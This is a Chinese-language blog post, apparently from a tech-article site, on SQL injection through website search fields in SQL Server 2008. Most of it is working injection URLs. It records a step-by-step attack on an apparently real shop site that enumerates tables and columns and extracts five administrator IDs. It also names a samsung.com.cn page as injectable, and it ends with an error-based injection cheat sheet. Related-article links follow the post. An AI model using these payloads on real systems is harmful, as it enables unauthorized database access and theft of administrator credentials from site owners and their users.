Sqlserver2008+搜索型注入技术
简单的判断搜索型注入漏洞存在不存在的办法是先搜索',如果出错,说明90%存在这个漏洞。然后搜索%,如果正常返回,说明95%有洞了。
然后再搜索一个关键字,比如2006吧,正常返回所有2006相关的信息,再搜索2006%'and 1=1 and '%'='和2006%'and 1=2 and '%'=',存在异同的话,就是100%有洞了。
我这里看出有上面说的洞后开始用nbsi来扫,结果总是超时,郁闷,看来要手工来暴需要的信息了。。。
http://www.2cto.com /product/list_search.aspx?search=Donic%'and user>0 and '%'=' //得到当前数据库账号
http://www.2cto.com /product/list_search.aspx?search=Donic%'and db_name()>0 and '%'=' //得到当前数据库名
http://www.2cto.com /product/list_search.aspx?search=Donic%'and (select count(*) from admin)>0 and '%'=' //返回错误页面,看来是没有admin这个表了
http://www.2cto.com /product/list_search.aspx?search=Donic%'and (select top 1 name from lvhuana3.dbo.sysobjects where xtype='u' and status>0)>0 and '%'=' //得到当前数据库的第一个表名
http://www.2cto.com /product/list_search.aspx?search=Donic%'and (select top 1 name from lvhuana3.dbo.sysobjects where xtype='u' and status>0 and name not in('codechange'))>0 and '%'=' //得到当前数据库的第二个表名
http://www.2cto.com /product/list_search.aspx?search=Donic%'and (select top 1 name from lvhuana3.dbo.sysobjects where xtype='u' and status>0 and name not in('codechange','oldpoint'))>0 and '%'=' //得到当前数据库的第三个表名
<A href="http://www.2cto.com /product/list_search.aspx?search=Donic%%27and%20(select%20top%201%20name%20from%20lvhuana3.dbo.sysobjects%20where%20xtype=%27u%27%20and%20status%3E0%20and%20name%20not%20in(%27codechange%27,%27oldpoint%27,%27tbl_admin%27,%27tbl_afterservice%27,%27tbl_agent%27,%27tbl_bank%27,%27tbl_board%27,%27tbl_board2%27,%27tbl_brandbestLeft%27,%27tbl_brandbestRight%27,%27tbl_card%27,%27tbl_cart%27,%27tbl_catalogue%27,%27tbl_community%27,%27tbl_court%27,%27tbl_estimate%27,%27tbl_FAQ%27,%27tbl_mail_list%27,%27tbl_mem_add%27,%27tbl_mem_main%27,%27tbl_mem_out%27,%27tbl_mem_rboard%27,%27tbl_mileage%27,%27tbl_notice%27,%27tbl_ord_cash_receipt%27,%27tbl_ord_change%27%27tbl_ord_cs%27,%27tbl_ord_change%27,%27tbl_ord_cs%27,%27tbl_ord_main%27,%27tbl_ord_payment%27,%27tbl_ord_prd%27,%27tbl_ord_prd_return%27,%27tbl_ord_refund%27,%27tbl_ord_req_main%27,%27tbl_ord_req_prd%27,%27tbl_ord_request%27,%27tbl_ord_user%27,%27tbl_partition%27,%27tbl_prd_category%27,%27tbl_prd_click%27,%27tbl_prd_desc%27,%27tbl_prd_grade%27,%27tbl_prd_main%27,%27tbl_prd_model%27,%27tbl_recommand%27,%27tbl_saleshop%27,%27tbl_search%27,%27tbl_tax%27,%27tbl_zipcode%27,%27tempDesc%27,%27tempdesc2%27,%27tempmodel%27,%27tempPrdMain%27,%27tempPrdmodel%27,%27tempsize%27,%27tempstyle%27,%27tmpordprd%27,%27tmpordprd2%27,%27trace1%27))%3E0%20and%20%27%%27=%27" target=_blank>http://www.2cto.com /product/list_search.aspx?search=Donic%'and%20(select%20top%201%20name%20from%20lvhuana3.dbo.sysobjects%20where%20xtype='u'%20and%20status>0%20and%20name%20not%20in('codechange','oldpoint','tbl_admin','tbl_afterservice','tbl_agent','tbl_bank','tbl_board','tbl_board2','tbl_brandbestLeft','tbl_brandbestRight','tbl_card','tbl_cart','tbl_catalogue','tbl_community','tbl_court','tbl_estimate','tbl_FAQ','tbl_mail_list','tbl_mem_add','tbl_mem_main','tbl_mem_out','tbl_mem_rboard','tbl_mileage','tbl_notice','tbl_ord_cash_receipt','tbl_ord_change''tbl_ord_cs','tbl_ord_change','tbl_ord_cs','tbl_ord_main','tbl_ord_payment','tbl_ord_prd','tbl_ord_prd_return','tbl_ord_refund','tbl_ord_req_main','tbl_ord_req_prd','tbl_ord_request','tbl_ord_user','tbl_partition','tbl_prd_category','tbl_prd_click','tbl_prd_desc','tbl_prd_grade','tbl_prd_main','tbl_prd_model','tbl_recommand','tbl_saleshop','tbl_search','tbl_tax','tbl_zipcode','tempDesc','tempdesc2','tempmodel','tempPrdMain','tempPrdmodel','tempsize','tempstyle','tmpordprd','tmpordprd2','trace1'))>0%20and%20'%'=' //依次类推,得到所有的表
其实分析可以知道只有这个tbl_admin表才是最重要的。接着开始暴列名。
http://www.2cto.com /product/list_search.aspx?search=Donic%'and (select top 1 col_name(object_id ('tbl_admin'),1) from tbl_admin)>0 and '%'=' //得到tbl_admin这个表里的第一个列名c_employee_id
http://www.2cto.com /product/list_search.aspx?search=Donic%'and (select top 1 col_name(object_id ('tbl_admin'),2) from tbl_admin)>0 and '%'=' //得到tbl_admin这个表里的第二个列名c_employee_name
http://www.2cto.com /product/list_search.aspx?search=Donic%'and (select top 1 col_name(object_id ('tbl_admin'),3) from tbl_admin)>0 and '%'=' //得到tbl_admin这个表里的第三个列名c_password
http://www.2cto.com /product/list_search.aspx?search=Donic%'and (select top 1 col_name(object_id ('tbl_admin'),3) from tbl_admin)>0 and '%'=' //得到tbl_admin这个表里的第四个列名c_level列名暴完毕了,嘿嘿,接着开始暴管理员账号密码了。
http://www.2cto.com /product/list_search.aspx?search=Donic%'and (select top 1 c_employee_id from tbl_admin)>0 and '%'=' //得到第一个管理员的id为943hoon
http://www.2cto.com /product/list_search.aspx?search=Donic%'and (select c_employee_id from(select top 1 * from(select top 2 * from tbl_admin order by 1)T order by 1 desc)S)>0 and '%'=' //得到第二个管理员的id为champ
http://www.2cto.com /product/list_search.aspx?search=Donic%'and (select c_employee_id from(select top 1 * from(select top 3 * from tbl_admin order by 1)T order by 1 desc)S)>0 and '%'=' //得到第三个管理员的id为clark
http://www.2cto.com /product/list_search.aspx?search=Donic%'and (select c_employee_id from(select top 1 * from(select top 4 * from tbl_admin order by 1)T order by 1 desc)S)>0 and '%'=' //得到第四个管理员的id为hskim
http://www.2cto.com /product/list_search.aspx?search=Donic%'and (select c_employee_id from(select top 1 * from(select top 4 * from tbl_admin order by 1)T order by 1 desc)S)>0 and '%'=' //得到第五个管理员的id为jajeong
http://www.2cto.com /product/list_search.aspx?search=Donic%'and (select top 1 c_c_password from tbl_admin)>0 and '%'=' //这个语句是暴出管理员密码的,可惜直接返回了正常页面,郁闷。。。。
一会再想别的办法吧。。。。。
另外说下,2.3 的啊D支持搜索型的注入方式是:
一般网站的搜索都是部分匹配的
有漏洞的url是http://notebook.samsung.com.cn/news/news.aspx?page=1&type=product&ST=title&SC=
构造注入语句 三星%'and 1=1 and '%'='
三星%'and 1=2 and '%'='
大家看到了吧 两个返回页面是不一样的 说明有注入的漏洞 特征字 写笔记本 就是三星%'and 1=1 and '%'=' 返回时有的
我们知道一般搜索代码是这么写的:
Select * from 表名where 字段like '%关键字%'
这样就造成了对关键字前后的所有匹配(%是用来全部匹配的)
这里如果关键字没有过滤的话,就可以这样来构造:
关键字='and [查询条件] and '%25'='
这样查询就变成
select * from 表名where 字段like '%' and 1=1 and '%'='%'
这样就很好的构成了一个sql注入点,当然用手工也可以,用nbsi也可以~~
注入是不分家的,没必要什么型什么型的!~
如果不信,大家请看下面的《sql注入天书》的原话
第一节、SQL注入的一般步骤
首先,判断环境,寻找注入点,判断数据库类型,这在入门篇已经讲过了。
其次,根据注入参数类型,在脑海中重构SQL语句的原貌,按参数类型主要分为下面三种:
(A) ID=49 这类注入的参数是数字型,SQL语句原貌大致如下:
Select * from 表名where 字段=49
注入的参数为ID=49 And [查询条件],即是生成语句:
Select * from 表名where 字段=49 And [查询条件]
(B) Class=连续剧这类注入的参数是字符型,SQL语句原貌大致概如下:
Select * from 表名where 字段='连续剧'
注入的参数为Class=连续剧'and [查询条件] and ''=' ,即是生成语句:
Select * from 表名where 字段='连续剧'and [查询条件] and ''=''
(C) 搜索时没过滤参数的,如keyword=关键字,SQL语句原貌大致如下:
Select * from 表名where 字段like '%关键字%'
注入的参数为keyword='and [查询条件] and '%25'=',即是生成语句:
Select * from 表名where字段like '%'and [查询条件] and '%'='%'
当然手工是麻烦的
用工具的话,我建议用nbsi的工具比较好,就我感觉只有nbsi结合了这个技术,用别的软体是不能注入的
注入点只要写:
http://www.2cto.com /news/news.aspx?page=1&type=product&ST=title&SC=%
再加个特征字符就可以了\
Sql2008注入
实验用语句可以参考网上的SQL显错注入
环境: Microsoft SQL Server 2008 + IIS6.0 + Windows Server 2003[NT 5.2 Sp 2]
让我们来收集一下信息
#查看数据库版本
URL.aspx?id=0701' AND 1=convert(int,@@version) AND 'risk'='risk
#查看当前用户名
URL.aspx?id=0701' AND user>0 AND 'risk'='risk
#查看当前库名
URL.aspx?id=0701' AND db_name()>0 AND 'risk'='risk
我们已经收集到了数据库的类型,版本,还有当前运行的用户和数据库了.
接下来是爆数据库里的表,显错模式要比不显得方便很多,直接爆就可以了.
#爆表名
URL.aspx?id=0701' AND 1=convert(int,(SELECT TOP 1 NAME FROM SYSOBJECTS WHERE XTYPE='u')) AND 'risk'='risk
#或者
URL.aspx?id=0701' AND 1=convert(int,(SELECT TOP 1 NAME FROM [库名]..SYSOBJECTS WHERE XTYPE='u')) AND 'risk'='risk
#爆其他表名,一直往上累计就可以了,最后完成的时候会跳转到正常页面
URL.aspx?id=0701' AND 1=convert(int,(SELECT TOP 1 NAME FROM SYSOBJECTS WHERE XTYPE='u' AND NAME NOT IN ('表名'))) AND 'risk'='risk
#爆当前表列名
URL.aspx?id=0701' HAVING 1=1 AND 'risk'='risk
#或者
URL.aspx?id=0701' SELECT * FROM 表名 HAVING 1=1 AND 'risk'='risk
#爆内容,每次爆一列单条数据
URL.aspx?id=0701' AND 1=convert(int,(SELECT TOP 1 列名 FROM 表名)) AND 'risk'='risk
#爆其余数据,和爆表一样,手动,一次爆一条
URL.aspx?id=0701' AND 1=convert(int,(SELECT TOP 1 列名 FROM 表名 WHERE 列名 NOT IN ('数据内容'))) AND 'risk'='risk
把以上的综合一下就行
比如 :http://www.baidu.com/search.aspx?kw=Donic%'and 1=convert(int,(SELECT TOP 1 NAME FROM [库名]..SYSOBJECTS WHERE XTYPE='u')) and '%'='
http://www.baidu.com/search.aspx?kw=Donic%'and 1=convert(int,(SELECT TOP 1 NAME FROM SYSOBJECTS WHERE XTYPE='u' AND NAME NOT IN ('表名'))) and '%'='
Sqlserver2008+搜索型注入技术的更多相关文章
- 注入语句详解(get注入,cookie注入,搜索型注入等)
注意:对于普通的get注入,如果是字符型,前加' 后加 and ''=' 拆半法 ###################################### and exists (select ...
- 数据库其他注入思路 - 万能密码 - cookie注入 -搜索型注入
另类登录注入形式: 经常有一类验证(ASP,PHP,JSP均存在),先判断user是否存在,ASP为例子:"select password from admin where user_nam ...
- pikachu-搜索型注入 #手工注入
1.搜索型注入漏洞产生的原因: 在搭建网站的时候为了方便用户搜索该网站中的资源,程序员在写网站脚本的时候加入了搜索功能,但是忽略了对搜索变量的过滤,造成了搜索型注入漏洞,又称文本框注入. 2.搜索型注 ...
- SQL注入技术专题—由浅入深【精华聚合】
作者:坏蛋链接:https://zhuanlan.zhihu.com/p/23569276来源:知乎著作权归作者所有.商业转载请联系作者获得授权,非商业转载请注明出处. 不管用什么语言编写的Web应用 ...
- Oracle学习总结(6)—— SQL注入技术
不管用什么语言编写的Web应用,它们都用一个共同点,具有交互性并且多数是数据库驱动.在网络中,数据库驱动的Web应用随处可见,由此而存在的SQL注入是影响企业运营且最具破坏性的漏洞之一. SQL注入基 ...
- 阿里云提示:对输入参数id未进行正确类型转义,导致整型注入的发生
类似以下提示: XXX.php中,对输入参数id未进行正确类型转义,导致整型注入的发生 解决办法: 找到对应文件:$id = $_GET['id']; 增加以下标红过滤: $id = $_GET['i ...
- SQL注入技术专题—由浅入深【精华聚合贴】
SQL注入技术专题—由浅入深[精华聚合贴] 不管用什么语言编写的Web应用,它们都用一个共同点,具有交互性并且多数是数据库驱动.在网络中,数据库驱动的Web应用随处可见,由此而存在的SQL注入是影响企 ...
- Android中通过进程注入技术改动广播接收器的优先级
前言 这个周末又没有吊事,在家研究了怎样通过进程的注入技术改动广播接收器的优先级.关于这个应用场景是非常多的.并且也非常重要.所以就非常急的去fixed了. Android中的四大组件中有一个广播:B ...
- 对Unity注入技术最简单的理解和应用
Unity注入技术,我决定最大的作用在于一个项目,尤其是WEB项目在更远其中一个类时,不需要重新生成,直接通过WEBCONFIG文件的修改就可以更改对应关系和功能,实验步骤如下: 1:新建一个接口IS ...
随机推荐
- bzoj 5315: [Jsoi2018]防御网络
Description Solution 考虑每一条边的贡献 对于树边,如果两边各存在一个点,那么有贡献,总贡献就是 \((2^{size}-1)*(2^{n-size}-1)\) 分别对应两边的 \ ...
- [转]vs2012 + web api + OData + EF + MYsql 开发及部署
本文转自:http://www.cnblogs.com/liumang/p/4403436.html 先说下我的情况,b/s开发这块已经很久没有搞了,什么web api .MVC.OData都只是听过 ...
- [转]微信小程序-template模板使用
本文转自:http://blog.csdn.net/u013778905/article/details/59646241 如下图,我在做华企商学院小程序的时候,课程搜索结果页和课程列表页结构是完全一 ...
- C#实体对象序列化成Json,格式化,并让字段的首字母小写
解决办法有两种:第一种:使用对象的字段属性设置JsonProperty来实现(不推荐,因为需要手动的修改每个字段的属性) public class UserInfo { [JsonProperty(& ...
- Expression Blend实例中文教程(7) - 动画基础快速入门Animation
通过前面文章学习,已经对Blend的开发界面,以及控件有了初步的认识.本文将讲述Blend的一个核心功能,动画设计.大家也许注意到,从开篇到现在,所有的文章都是属于快速入门,是因为这些文章,都是我曾经 ...
- MVC-cshtml(条件编译已关闭)
加单引号
- Asp.net MVC5系列——第一个项目
转自http://www.cnblogs.com/wolf-sun/p/3888160.html 概述 在这一部分我们添加一个新的控制器HelloWorldController类,以便使用视图来向客户 ...
- 纯手写实现HashMap
1.hashmap的实现 ① 初始化 1)定义一个Node<K, V>的数组来存放元素,但不立即初始化,在使用的时候再加载 2)定义数组初始大小为16 3)定义负载因子,默认为0.75, ...
- Oracle查询表名超过长度限制的表
SELECT T.table_name, LENGTH(TRIM(T.table_name)) FROM user_tables t ORDER BY LENGTH(TRIM(t.table_name ...
- form表单在发送到服务器时候编码方式
enctype(编码方式):规定了form表单在发送到服务器时候编码方式.有如下的三个值可选: 1.application/x-www-form-urlencoded.默认的编码方式.但是在用文本的传 ...